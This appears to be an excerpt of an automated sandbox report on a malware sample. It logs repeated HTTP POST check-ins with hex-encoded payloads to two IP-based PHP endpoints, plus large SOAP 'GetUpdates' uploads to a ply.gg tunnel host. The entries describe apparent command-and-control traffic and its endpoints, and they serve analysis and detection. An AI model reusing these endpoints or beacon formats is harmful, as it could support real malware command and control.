                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" | Host: b-stamps.gl.at.ply.gg:30946 | Content-Length: 95714 | Expect: 100-continue | Accept-Encoding: gzip, deflate | Connection: Keep-Alive
                              Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" | Host: b-stamps.gl.at.ply.gg:30946 | Content-Length: 95713 | Expect: 100-continue | Accept-Encoding: gzip, deflate | Connection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
